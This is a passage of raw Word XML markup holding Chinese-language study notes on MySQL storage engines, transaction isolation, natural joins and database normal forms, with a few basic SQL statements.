      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认的存储引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show  table   status  from  database  where  name="tablename" //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看某一个表使用的引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不一定就是默认引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">create table mytbl(   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    id int primary key,   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    name varchar(50)   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)type=MyISAM;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alter table table_name type = InnoDB;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引擎：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>1. MyIsam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Isam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , 2. InnoDB, 3. Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（又称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HEAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>, 4. Blackhole, 5. CSV, 6. Performance_Schema, 7. Archive, 8. Federated , 9 Mrg_Myisam</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>数据库引擎的选择是性能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与使用方便程度函数线上的一个选择。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r>
        <w:t>引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>的默认引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>优点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：性能上比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更加好，如果并发只是需要读取的时候推荐使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MyISAM   </w:t>
      </w:r>
      <w:r>
        <w:t>这种存储引擎不支持事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（所以不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rollback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>，不支持行级锁，只支持并发插入的表锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（插入与更新的时候需要锁定整个表）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r>
        <w:t>表存储为三个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.frm</w:t>
      </w:r>
      <w:r>
        <w:t>文件存储表定义。数据文件的扩展名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.MYD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (MYData)</w:t>
      </w:r>
      <w:r>
        <w:t>。索引文件的扩展名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.MYI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (MYIndex)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r>
        <w:t>作为索引结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MyISAM   </w:t>
      </w:r>
      <w:r>
        <w:t>类型的表支持三种不同的存储结构：静态型、动态型、压缩型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>压缩型：如果在这个数据库中创建的是在整个生命周期内只读的表，则这种情况就是用</w:t>
      </w:r>
      <w:r>
        <w:t>myisam</w:t>
      </w:r>
      <w:r>
        <w:t>的压缩型表来减少空间的占用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>也使用缓存池</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅仅缓存</w:t>
      </w:r>
      <w:r>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>Innodb</w:t>
      </w:r>
      <w:r>
        <w:t>引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mariadb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认引擎</w:t>
      </w:r>
      <w:r>
        <w:t>Maria</w:t>
      </w:r>
      <w:r>
        <w:t>的参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Innodb</w:t>
      </w:r>
      <w:r>
        <w:t>会在内存中建立缓冲池，用于缓冲数据和索引。但是该引擎不支持</w:t>
      </w:r>
      <w:r>
        <w:t>FULLTEXT</w:t>
      </w:r>
      <w:r>
        <w:t>类型的索引，而且它没有保存表的行数，当</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT COUNT(*) FROM TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>时需要扫描全表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r>
        <w:t>作为索引结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>具体实现上与</w:t>
      </w:r>
      <w:r>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r>
        <w:t>有点区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>Memroy</w:t>
      </w:r>
      <w:r>
        <w:t>引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行锁、事务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>每个基于</w:t>
      </w:r>
      <w:r>
        <w:t>memory</w:t>
      </w:r>
      <w:r>
        <w:t>存储引擎的表实际对应一个磁盘文件，该文件的文件名与表名相同，类型为</w:t>
      </w:r>
      <w:r>
        <w:t>frm</w:t>
      </w:r>
      <w:r>
        <w:t>类型。该文件只存储表的结构，而其数据文件，都是存储在内存中的，这样有利于对数据的快速的处理，提高整个表的处理效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:t>作为索引结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:t>如果从内存表中删除单独的行，并不会回收内存。当整个内存表删除时，才回收内存。同一张内存表，之前删除行占用的空间，会被新的行复用。执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:t>TRUNCATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:t>来释放内存表占用空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="bjh-p"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Blackhole</w:t>
      </w:r>
      <w:r>
        <w:t>黑洞引擎：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>slave</w:t>
      </w:r>
      <w:r>
        <w:t>结构中提升</w:t>
      </w:r>
      <w:r>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t>性能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>任何写入到此引擎的数据均会被丢弃掉，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>不做实际存储；</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>语句的内容永远是空。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /dev/null </w:t>
      </w:r>
      <w:r>
        <w:t>文件完成的作用完全一致。</w:t>
      </w:r>
      <w:r>
        <w:t>Blackhole</w:t>
      </w:r>
      <w:r>
        <w:t>虽然不存储数据，但是</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>还是会正常的记录下</w:t>
      </w:r>
      <w:r>
        <w:t>Binlog</w:t>
      </w:r>
      <w:r>
        <w:t>，而且这些</w:t>
      </w:r>
      <w:r>
        <w:t>Binlog</w:t>
      </w:r>
      <w:r>
        <w:t>还会被正常的同步到</w:t>
      </w:r>
      <w:r>
        <w:t>Slave</w:t>
      </w:r>
      <w:r>
        <w:t>上，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>Slave</w:t>
      </w:r>
      <w:r>
        <w:t>上对数据进行后续的处理。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>这样对于在</w:t>
      </w:r>
      <w:r>
        <w:t>Master</w:t>
      </w:r>
      <w:r>
        <w:t>上只需要</w:t>
      </w:r>
      <w:r>
        <w:t>Binlog</w:t>
      </w:r>
      <w:r>
        <w:t>而不需要数据的场合下，</w:t>
      </w:r>
      <w:r>
        <w:t>balckhole</w:t>
      </w:r>
      <w:r>
        <w:t>就有用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798"/>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798" w:rsidP="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务隔离，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的隔离级别是可重复读（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>REPEATABLE READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在同一个事务中读取的值总是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798" w:rsidP="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了感知到变化，必须重新获取一个事务，理论可解决的方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798" w:rsidP="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conneciton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新获取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798" w:rsidP="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将该事务提交</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3798" w:rsidRDefault="009A3798" w:rsidP="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的事务隔离级别到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>READ COMMITED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="009A3798">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文演示前两种办法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三种办法不推荐使用，因为事务本身就是保护操作的，不建议修改事务隔离级别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2E98" w:rsidRDefault="00DE2E98"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>没有公共属性的时候，自然连接相当于笛卡尔积。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">R(U,D,DOM,F) </w:t>
      </w:r>
      <w:r>
        <w:t>属性、域、属性到域的映射、属性组上的数据依赖</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>重要的有函数依赖与多值依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:t>模式设计的时候只看</w:t>
      </w:r>
      <w:r>
        <w:t>R(U,F),</w:t>
      </w:r>
      <w:r>
        <w:t>与值关系不大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>目前关系数据库有六种范式，按照规范化程度区分：第一范式（</w:t>
      </w:r>
      <w:r>
        <w:t>1NF</w:t>
      </w:r>
      <w:r>
        <w:t>）、第二范式（</w:t>
      </w:r>
      <w:r>
        <w:t>2NF</w:t>
      </w:r>
      <w:r>
        <w:t>）、第三范式（</w:t>
      </w:r>
      <w:r>
        <w:t>3NF</w:t>
      </w:r>
      <w:r>
        <w:t>）、第四范式（</w:t>
      </w:r>
      <w:r>
        <w:t>4NF</w:t>
      </w:r>
      <w:r>
        <w:t>）、第五范式（</w:t>
      </w:r>
      <w:r>
        <w:t>5NF</w:t>
      </w:r>
      <w:r>
        <w:t>）和第六范式（</w:t>
      </w:r>
      <w:r>
        <w:t>6NF</w:t>
      </w:r>
      <w:r>
        <w:t>）。满足最低要求的范式是第一范式（</w:t>
      </w:r>
      <w:r>
        <w:t>1NF</w:t>
      </w:r>
      <w:r>
        <w:t>），在第一范式的基础上进一步满足更多要求的称为第二范式（</w:t>
      </w:r>
      <w:r>
        <w:t>2NF</w:t>
      </w:r>
      <w:r>
        <w:t>），其余范式以次类推。一般说来，数据库只需满足第三范式（</w:t>
      </w:r>
      <w:r>
        <w:t>3NF</w:t>
      </w:r>
      <w:r>
        <w:t>）就行了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>BCNF</w:t>
      </w:r>
      <w:r>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:t>3NF</w:t>
      </w:r>
      <w:r>
        <w:t>基础上的改进式，</w:t>
      </w:r>
      <w:r>
        <w:t>BCNF</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>3NF</w:t>
      </w:r>
      <w:r>
        <w:t>更为严格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1NF——</w:t>
      </w:r>
      <w:r>
